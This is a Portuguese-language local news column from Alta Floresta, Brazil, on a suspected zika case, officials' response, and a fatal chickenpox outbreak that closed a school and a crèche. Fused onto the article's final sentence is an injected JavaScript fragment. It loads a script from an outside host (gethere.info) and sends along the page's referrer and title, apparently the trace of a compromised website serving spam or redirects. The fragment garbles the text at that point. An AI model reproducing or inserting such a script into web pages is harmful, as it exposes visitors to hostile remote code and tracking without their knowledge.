Capa / Educação / Tiro e Queda

Tiro e Queda

Tiro e QuedaNesta semana nós alertamos aqui no Tiro e Queda sobre a possibilidade de surgirem casos de zikavirus e os cuidados que nós temos que ter. Ontem, durante a sessão ordinária na Câmara de Vereadores, o assunto foi debatido, desta vez com uma informação que foi trazida à público pelo vereador Paulinho Jiló, de que existe sim um caso suspeito em Alta Floresta.

Conversamos com o secretário de saúde de Alta Floresta, José Luiz, que confirmou que a criança do São José Operário, atendida no PSF Bom Jesus (setor industrial) de fato apresentou sintomas que sugerem a doença.

No entanto é preciso tomar muito cuidado, afinal, os sintomas de zika, Chikungunya e Dengue, são muito parecidos, com qualquer outra “virose” que aparece aos montes por aí, pelo menos é o que a literatura médica nos apresenta.

Mas ainda assim não dá pra desprezar nenhuma informação.

O secretário confirmou que há mais de um caso sendo investigado, inclusive na rede particular, o que não é motivo para alarde, porque segundo disse, as autoridades estão atentas, tanto que já será feito um trabalho de borrifação para eliminação do mosquito vetor, o aedes aegypti.

Aí eu lembrei daquela propaganda da TV que a apresentadora tenta fazer o cara mudar de tubulação… “ah, se estamos ao vivo, aí a resposta é…. não”….

Passando pra nossa realidade, com o secretário tentando manter a calma, “ah se a secretaria está atenta, se vai começar a borrifar a resposta é…. não”…

Ce tá doido, Jacarandá…

É pra estar preocupado sim…  Aqui em Alta Floresta o índice de mosquito sempre foi alto, então o governo que faça a sua parte e nós, cidadãos, também entremos nesta cruzada, antes que este mosquito “zike” tudo, já imaginou a ziquezira que vai dar?

Outro assunto, ainda na área de saúde, na semana que passou foi confirmada a morte de uma criança de Alta Floresta por catapora. A criança foi atendida na rede particular, encaminhada incialmente à Sinop, e em seguida à Cuiabá, mas não suportou. Por causa deste caso, as aulas foram suspensas em uma escola e uma creche no bairro Universitário por sete dias. Foram detectados 30 casos de catapora, o que já indica um surto.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top